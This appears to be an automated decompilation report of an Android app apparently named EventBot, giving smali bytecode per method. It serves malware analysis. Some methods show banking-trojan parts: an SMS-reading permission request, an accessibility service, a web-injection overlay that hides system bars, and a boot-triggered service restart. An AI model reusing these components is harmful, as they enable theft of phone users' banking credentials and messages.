                        1if-eqz p1, :cond_5
                        2return-void
                        3cond_5: new-instance p1, Ljava/lang/RuntimeException;
                        5const-string v0, "Binders cannot be written to an OutputStream"
                        7invoke-direct {p1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        8throw p1
                        APIs
                        • com.example.eventbot.MainActivity.requestPermissions
                        Strings
                        • android.permission.READ_SMS
                        Position Instruction Meta Information
                        1const-string p1, "android.permission.READ_SMS"
                        2filled-new-array {p1}, [Ljava/lang/String;
                        3move-result-object p1
                        4const/16 v0, 0x7b
                        6invoke-virtual {p0, p1, v0}, Lcom/example/eventbot/MainActivity;->requestPermissions([Ljava/lang/String;I)V
                        7return-void
                        APIs
                        • android.util.Log.d
                        Strings
                        • [func] [service] onBind
                        Position Instruction Meta Information
                        1sget-object p1, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        3const-string v0, "[func] [service] onBind"
                        5invoke-static {p1, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
                        6const/4 p1, 0x0
                        7return-object p1
                        APIs
                        • com.example.eventbot.events.TAG:Ljava/lang/String
                        • android.util.Log.v
                        Strings
                        • ***** [a11y] [func] onInterrupt
                        Position Instruction Meta Information
                        1sget-object v0, Lcom/example/eventbot/events;->TAG:Ljava/lang/String;
                        3const-string v1, "***** [a11y] [func] onInterrupt"
                        5invoke-static {v0, v1}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        6return-void
                        APIs
                        • java.nio.charset.Charset.forName
                        Strings
                        • UTF-16
                        Position Instruction Meta Information
                        1const-string v0, "UTF-16"
                        3invoke-static {v0}, Ljava/nio/charset/Charset;->forName(Ljava/lang/String;)Ljava/nio/charset/Charset;
                        4move-result-object v0
                        5sput-object v0, Landroidx/versionedparcelable/VersionedParcelStream;->UTF_16:Ljava/nio/charset/Charset;
                        6return-void
                        APIs
                        • android.support.v4.graphics.drawable.IconCompat.<init>
                        • android.support.v4.graphics.drawable.IconCompat.mData:[B
                        • android.support.v4.graphics.drawable.IconCompat.mParcelable:Landroid/os/Parcelable
                        • android.support.v4.graphics.drawable.IconCompat.mTintList:Landroid/content/res/ColorStateList
                        • android.support.v4.graphics.drawable.IconCompat.mTintModeStr:Ljava/lang/String
                        • android.support.v4.graphics.drawable.IconCompat.onPostParceling
                        Position Instruction Meta Information
                        0new-instance v0, Landroid/support/v4/graphics/drawable/IconCompat;
                        2invoke-direct {v0}, Landroid/support/v4/graphics/drawable/IconCompat;-><init>()V
                        3iget v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mType:I
                        4const/4 v2, 0x1
                        6invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        7move-result v1
                        8iput v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mType:I
                        10iget-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mData:[B
                        11const/4 v2, 0x2
                        13invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readByteArray([BI)[B
                        14move-result-object v1
                        15iput-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mData:[B
                        17iget-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mParcelable:Landroid/os/Parcelable;
                        18const/4 v2, 0x3
                        20invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable(Landroid/os/Parcelable;I)Landroid/os/Parcelable;
                        21move-result-object v1
                        22iput-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mParcelable:Landroid/os/Parcelable;
                        23iget v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt1:I
                        24const/4 v2, 0x4
                        26invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        27move-result v1
                        28iput v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt1:I
                        29iget v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt2:I
                        30const/4 v2, 0x5
                        32invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readInt(II)I
                        33move-result v1
                        34iput v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mInt2:I
                        36iget-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintList:Landroid/content/res/ColorStateList;
                        37const/4 v2, 0x6
                        39invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readParcelable(Landroid/os/Parcelable;I)Landroid/os/Parcelable;
                        40move-result-object v1
                        41check-cast v1, Landroid/content/res/ColorStateList;
                        42iput-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintList:Landroid/content/res/ColorStateList;
                        44iget-object v1, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintModeStr:Ljava/lang/String;
                        45const/4 v2, 0x7
                        47invoke-virtual {p0, v1, v2}, Landroidx/versionedparcelable/VersionedParcel;->readString(Ljava/lang/String;I)Ljava/lang/String;
                        48move-result-object p0
                        49iput-object p0, v0, Landroid/support/v4/graphics/drawable/IconCompat;->mTintModeStr:Ljava/lang/String;
                        51invoke-virtual {v0}, Landroid/support/v4/graphics/drawable/IconCompat;->onPostParceling()V
                        52return-object v0
                        Cross References
                        APIs
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • com.lib$webInjViewClientOld.context:Landroid/content/Context
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • com.lib$webInjViewClientOld.context:Landroid/content/Context
                        • com.lib$webInjViewClientOld.context:Landroid/content/Context
                        • com.lib$webInjViewClientOld.this$0:Lcom/lib
                        • com.lib$webInjViewClientOld.context:Landroid/content/Context
                        • com.lib$webInjViewClientOld.webOverlay:Landroid/webkit/WebView
                        Strings
                        • [func] [activity] [webViewClient] [onPageFinished] [needStop] [stop]
                        • webInjPrefs
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        4const-string v1, "[func] [activity] [webViewClient] [onPageFinished] [needStop] [stop]"
                        6invoke-virtual {v0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        8iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        10iget-object v1, p0, Lcom/lib$webInjViewClientOld;->context:Landroid/content/Context;
                        12const-string v2, "webInjPrefs"
                        14iget-object v3, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        16iget-object v3, v3, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        17const/4 v4, 0x0
                        19invoke-virtual {v0, v1, v2, v3, v4}, Lcom/lib;->updateWebInjConfig(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Z)Z
                        21iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        22const/4 v1, 0x0
                        23iput-object v1, v0, Lcom/lib;->webInjCurrentApp:Ljava/lang/String;
                        25iget-object v0, p0, Lcom/lib$webInjViewClientOld;->context:Landroid/content/Context;
                        27sget-object v1, Lcom/lib;->navBar:Landroid/widget/FrameLayout;
                        29invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        31iget-object v0, p0, Lcom/lib$webInjViewClientOld;->context:Landroid/content/Context;
                        33sget-object v1, Lcom/lib;->actBar:Landroid/widget/FrameLayout;
                        35invoke-static {v0, v1}, Lcom/lib;->unHideArea(Landroid/content/Context;Landroid/widget/FrameLayout;)Z
                        37iget-object v0, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        39iget-object v1, p0, Lcom/lib$webInjViewClientOld;->context:Landroid/content/Context;
                        41iget-object v2, p0, Lcom/lib$webInjViewClientOld;->webOverlay:Landroid/webkit/WebView;
                        43invoke-virtual {v0, v1, v2}, Lcom/lib;->removeOverlay(Landroid/content/Context;Landroid/webkit/WebView;)Z
                        44return-void
                        APIs
                        • android.util.SparseBooleanArray.<init>
                        • android.util.SparseBooleanArray.put
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->readField(I)Z
                        2move-result p2
                        3if-nez p2, :cond_7
                        4return-object p1
                        5cond_7:
                        6invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        7move-result p1
                        8if-gez p1, :cond_f
                        9const/4 p1, 0x0
                        10return-object p1
                        11cond_f: new-instance p2, Landroid/util/SparseBooleanArray;
                        13invoke-direct {p2, p1}, Landroid/util/SparseBooleanArray;-><init>(I)V
                        14const/4 v0, 0x0
                        15goto_15: if-ge v0, p1, :cond_25
                        17invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readInt()I
                        18move-result v1
                        20invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcel;->readBoolean()Z
                        21move-result v2
                        23invoke-virtual {p2, v1, v2}, Landroid/util/SparseBooleanArray;->put(IZ)V
                        24add-int/lit8 v0, v0, 0x1
                        25goto/16 :goto_15
                        26cond_25: return-object p2
                        Cross References
                        APIs
                        • java.io.ByteArrayOutputStream.size
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mFieldBuffer:Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;
                        2if-eqz v0, :cond_1c
                        3try_start_4:
                        4iget-object v0, v0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mOutput:Ljava/io/ByteArrayOutputStream;
                        6invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->size()I
                        7move-result v0
                        8if-eqz v0, :cond_11
                        10iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mFieldBuffer:Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;
                        12invoke-virtual {v0}, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->flushField()V
                        13try_end_11: const/4 v0, 0x0
                        14iput-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mFieldBuffer:Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;
                        15goto/16 :goto_1c
                        16catch_15: move-exception v0
                        17new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        19invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        20throw v1
                        21goto_1c: return-void
                        APIs
                        • android.util.Size.getWidth
                        • android.util.Size.getHeight
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->setOutputField(I)V
                        2if-eqz p1, :cond_7
                        3const/4 p2, 0x1
                        4goto/16 :goto_8
                        5cond_7: const/4 p2, 0x0
                        6goto_8:
                        7invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeBoolean(Z)V
                        8if-eqz p1, :cond_1b
                        10invoke-virtual {p1}, Landroid/util/Size;->getWidth()I
                        11move-result p2
                        13invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        15invoke-virtual {p1}, Landroid/util/Size;->getHeight()I
                        16move-result p1
                        18invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeInt(I)V
                        19cond_1b: return-void
                        APIs
                        • android.util.SizeF.getWidth
                        • android.util.SizeF.getHeight
                        Position Instruction Meta Information
                        1invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->setOutputField(I)V
                        2if-eqz p1, :cond_7
                        3const/4 p2, 0x1
                        4goto/16 :goto_8
                        5cond_7: const/4 p2, 0x0
                        6goto_8:
                        7invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeBoolean(Z)V
                        8if-eqz p1, :cond_1b
                        10invoke-virtual {p1}, Landroid/util/SizeF;->getWidth()F
                        11move-result p2
                        13invoke-virtual {p0, p2}, Landroidx/versionedparcelable/VersionedParcel;->writeFloat(F)V
                        15invoke-virtual {p1}, Landroid/util/SizeF;->getHeight()F
                        16move-result p1
                        18invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeFloat(F)V
                        19cond_1b: return-void
                        APIs
                        • android.os.Parcel.dataPosition
                        • android.util.SparseIntArray.put
                        Position Instruction Meta Information
                        1invoke-virtual {p0}, Landroidx/versionedparcelable/VersionedParcelParcel;->closeField()V
                        2iput p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mCurrentField:I
                        4iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mPositionLookup:Landroid/util/SparseIntArray;
                        6iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        8invoke-virtual {v1}, Landroid/os/Parcel;->dataPosition()I
                        9move-result v1
                        11invoke-virtual {v0, p1, v1}, Landroid/util/SparseIntArray;->put(II)V
                        12const/4 v0, 0x0
                        14invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcelParcel;->writeInt(I)V
                        16invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcelParcel;->writeInt(I)V
                        17return-void
                        APIs
                        • java.lang.Integer.intValue
                        • java.lang.Integer.intValue
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        3invoke-virtual {p3}, Ljava/lang/Integer;->intValue()I
                        4move-result v1
                        5const/4 v2, -0x1
                        6if-ne v1, v2, :cond_f
                        8invoke-virtual {p2}, Ljava/lang/Integer;->intValue()I
                        9move-result v1
                        10packed-switch v1, :pswitch_data_12
                        11goto_f: return v0
                        12pswitch_10: const/4 v0, 0x1
                        13goto/16 :goto_f
                        APIs
                        • android.os.Parcel.readInt
                        • android.os.Parcel.readByteArray
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readInt()I
                        4move-result v0
                        5if-gez v0, :cond_a
                        6const/4 v0, 0x0
                        7return-object v0
                        8cond_a: new-array v0, v0, [B
                        10iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        12invoke-virtual {v1, v0}, Landroid/os/Parcel;->readByteArray([B)V
                        13return-object v0
                        APIs
                        • android.os.Handler.<init>
                        • android.os.Handler.postDelayed
                        Position Instruction Meta Information
                        0sget-boolean p2, Lcom/example/eventbot/service;->isRunning:Z
                        1if-nez p2, :cond_13
                        2new-instance p2, Landroid/os/Handler;
                        4invoke-direct {p2}, Landroid/os/Handler;-><init>()V
                        5new-instance v0, Lcom/example/eventbot/boot$1;
                        7invoke-direct {v0, p0, p1}, Lcom/example/eventbot/boot$1;-><init>(Lcom/example/eventbot/boot;Landroid/content/Context;)V
                        8const-wide/16 v1, 0x0
                        10invoke-virtual {p2, v0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        11cond_13: return-void
                        Cross References
                        APIs
                        • android.os.Parcel.dataPosition
                        • android.os.Parcel.dataSize
                        Position Instruction Meta Information
                        1invoke-virtual {p1}, Landroid/os/Parcel;->dataPosition()I
                        2move-result v0
                        4invoke-virtual {p1}, Landroid/os/Parcel;->dataSize()I
                        5move-result v1
                        7const-string v2, ""
                        9invoke-direct {p0, p1, v0, v1, v2}, Landroidx/versionedparcelable/VersionedParcelParcel;-><init>(Landroid/os/Parcel;IILjava/lang/String;)V
                        10return-void
                        Cross References
                        APIs
                        • java.io.DataInputStream.readBoolean
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readBoolean()Z
                        4move-result v0
                        5try_end_6: return v0
                        6catch_7: move-exception v0
                        7new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        9invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        10throw v1
                        Cross References
                        APIs
                        • java.io.DataInputStream.readDouble
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readDouble()D
                        4move-result-wide v0
                        5try_end_6: return-wide v0
                        6catch_7: move-exception v0
                        7new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        9invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        10throw v1
                        Cross References
                        APIs
                        • java.io.DataInputStream.readFloat
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readFloat()F
                        4move-result v0
                        5try_end_6: return v0
                        6catch_7: move-exception v0
                        7new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        9invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        10throw v1
                        Cross References
                        APIs
                        • java.io.DataInputStream.readInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readInt()I
                        4move-result v0
                        5try_end_6: return v0
                        6catch_7: move-exception v0
                        7new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        9invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        10throw v1
                        Cross References
                        APIs
                        • java.io.DataInputStream.readLong
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readLong()J
                        4move-result-wide v0
                        5try_end_6: return-wide v0
                        6catch_7: move-exception v0
                        7new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        9invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        10throw v1
                        APIs
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/Thread;
                        2new-instance v1, Lcom/lib$7;
                        4invoke-direct {v1, p0, p1, p2}, Lcom/lib$7;-><init>(Lcom/lib;Landroid/content/Context;Landroid/content/Intent;)V
                        6invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        8invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        9return-void
                        APIs
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/Thread;
                        2new-instance v1, Lcom/lib$5;
                        4invoke-direct {v1, p0, p1, p2, p3}, Lcom/lib$5;-><init>(Lcom/lib;Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        6invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        8invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        9return-void
                        APIs
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/Thread;
                        2new-instance v1, Lcom/lib$6;
                        4invoke-direct {v1, p0, p1, p2, p3}, Lcom/lib$6;-><init>(Lcom/lib;Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        6invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        8invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        9return-void
                        APIs
                        • java.lang.Thread.<init>
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Ljava/lang/Thread;
                        2new-instance v1, Lcom/lib$4;
                        4invoke-direct {v1, p0, p1, p2, p3}, Lcom/lib$4;-><init>(Lcom/lib;Landroid/content/Context;Landroid/content/BroadcastReceiver;Landroid/content/Intent;)V
                        6invoke-direct {v0, v1}, Ljava/lang/Thread;-><init>(Ljava/lang/Runnable;)V
                        8invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        9return-void
                        Cross References
                        APIs
                        • android.widget.Toast.makeText
                        • android.widget.Toast.show
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib;->context:Landroid/content/Context;
                        3const/4 v1, 0x1
                        5invoke-static {v0, p1, v1}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
                        6move-result-object v0
                        8invoke-virtual {v0}, Landroid/widget/Toast;->show()V
                        9return-void
                        Cross References
                        APIs
                        • java.io.DataOutputStream.writeBoolean
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3invoke-virtual {v0, p1}, Ljava/io/DataOutputStream;->writeBoolean(Z)V
                        4try_end_5: return-void
                        5catch_6: move-exception p1
                        6new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        8invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        9throw v0
                        Cross References
                        APIs
                        • java.io.DataOutputStream.writeDouble
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3invoke-virtual {v0, p1, p2}, Ljava/io/DataOutputStream;->writeDouble(D)V
                        4try_end_5: return-void
                        5catch_6: move-exception p1
                        6new-instance p2, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        8invoke-direct {p2, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        9throw p2
                        Cross References
                        APIs
                        • java.io.DataOutputStream.writeFloat
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3invoke-virtual {v0, p1}, Ljava/io/DataOutputStream;->writeFloat(F)V
                        4try_end_5: return-void
                        5catch_6: move-exception p1
                        6new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        8invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        9throw v0
                        Cross References
                        APIs
                        • java.io.DataOutputStream.writeInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3invoke-virtual {v0, p1}, Ljava/io/DataOutputStream;->writeInt(I)V
                        4try_end_5: return-void
                        5catch_6: move-exception p1
                        6new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        8invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        9throw v0
                        Cross References
                        APIs
                        • java.io.DataOutputStream.writeLong
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3invoke-virtual {v0, p1, p2}, Ljava/io/DataOutputStream;->writeLong(J)V
                        4try_end_5: return-void
                        5catch_6: move-exception p1
                        6new-instance p2, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        8invoke-direct {p2, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        9throw p2
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Context.startService
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/example/eventbot/boot$1;->val$context:Landroid/content/Context;
                        2new-instance v1, Landroid/content/Intent;
                        3const-class v2, Lcom/example/eventbot/service;
                        5invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        7invoke-virtual {v0, v1}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        8return-void
                        APIs
                        • android.content.Intent.<init>
                        • com.example.eventbot.service.startService
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/example/eventbot/service$2;->this$0:Lcom/example/eventbot/service;
                        2new-instance v1, Landroid/content/Intent;
                        3const-class v2, Lcom/example/eventbot/service;
                        5invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        7invoke-virtual {v0, v1}, Lcom/example/eventbot/service;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        8return-void
                        APIs
                        • android.content.Intent.<init>
                        • com.example.eventbot.service.startService
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/example/eventbot/service$3;->this$0:Lcom/example/eventbot/service;
                        2new-instance v1, Landroid/content/Intent;
                        3const-class v2, Lcom/example/eventbot/service;
                        5invoke-direct {v1, v0, v2}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        7invoke-virtual {v0, v1}, Lcom/example/eventbot/service;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        8return-void
                        APIs
                        • java.lang.Throwable.getCause
                        • java.lang.Throwable.getCause
                        Position Instruction Meta Information
                        0goto_0:
                        1invoke-virtual {p0}, Ljava/lang/Throwable;->getCause()Ljava/lang/Throwable;
                        2move-result-object v0
                        3if-eqz v0, :cond_b
                        5invoke-virtual {p0}, Ljava/lang/Throwable;->getCause()Ljava/lang/Throwable;
                        6move-result-object p0
                        7goto/16 :goto_0
                        8cond_b: return-object p0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1move-object/from16 v0, p1
                        2move-object/from16 v1, p0
                        3iput-object v0, v1, Lcom/lib$Curve25519;->this$0:Lcom/lib;
                        5invoke-direct/range {p0 .. p0}, Ljava/lang/Object;-><init>()V
                        6const/16 v2, 0x20
                        7move-object/from16 v0, p0
                        8iput v2, v0, Lcom/lib$Curve25519;->KEY_SIZE:I
                        9const/16 v2, 0x20
                        10new-array v2, v2, [B
                        11fill-array-data v2, :array_9c
                        12move-object/from16 v0, p0
                        13iput-object v2, v0, Lcom/lib$Curve25519;->ZERO:[B
                        14const/16 v2, 0x20
                        15new-array v2, v2, [B
                        16fill-array-data v2, :array_b0
                        17move-object/from16 v0, p0
                        18iput-object v2, v0, Lcom/lib$Curve25519;->PRIME:[B
                        19const/16 v2, 0x20
                        20new-array v2, v2, [B
                        21fill-array-data v2, :array_c4
                        22move-object/from16 v0, p0
                        23iput-object v2, v0, Lcom/lib$Curve25519;->ORDER:[B
                        24const v2, 0x1ffffff
                        25move-object/from16 v0, p0
                        26iput v2, v0, Lcom/lib$Curve25519;->P25:I
                        27const v2, 0x3ffffff
                        28move-object/from16 v0, p0
                        29iput v2, v0, Lcom/lib$Curve25519;->P26:I
                        30const/16 v2, 0x20
                        31new-array v2, v2, [B
                        32fill-array-data v2, :array_d8
                        33move-object/from16 v0, p0
                        34iput-object v2, v0, Lcom/lib$Curve25519;->ORDER_TIMES_8:[B
                        35new-instance v2, Lcom/lib$Curve25519$long10;
                        36const-wide/32 v4, 0x262583b
                        37const-wide/32 v6, 0x11d2ec0
                        38const-wide/32 v8, 0x3937585
                        39const-wide/32 v10, 0x192839
                        40const-wide/32 v12, 0x36e1594
                        41const-wide/32 v14, 0x16e5d66
                        42const-wide/32 v16, 0x122d388
                        43const-wide/32 v18, 0x52c7f8
                        44const-wide/32 v20, 0x3c8ebef
                        45const-wide/32 v22, 0xfa8f32
                        46move-object/from16 v3, p0
                        48invoke-direct/range {v2 .. v23}, Lcom/lib$Curve25519$long10;-><init>(Lcom/lib$Curve25519;JJJJJJJJJJ)V
                        49move-object/from16 v0, p0
                        50iput-object v2, v0, Lcom/lib$Curve25519;->BASE_2Y:Lcom/lib$Curve25519$long10;
                        51new-instance v2, Lcom/lib$Curve25519$long10;
                        52const-wide/16 v4, 0x1670
                        53const-wide/32 v6, 0x7c8650
                        54const-wide/32 v8, 0x491a6d
                        55const-wide/32 v10, 0xd24229
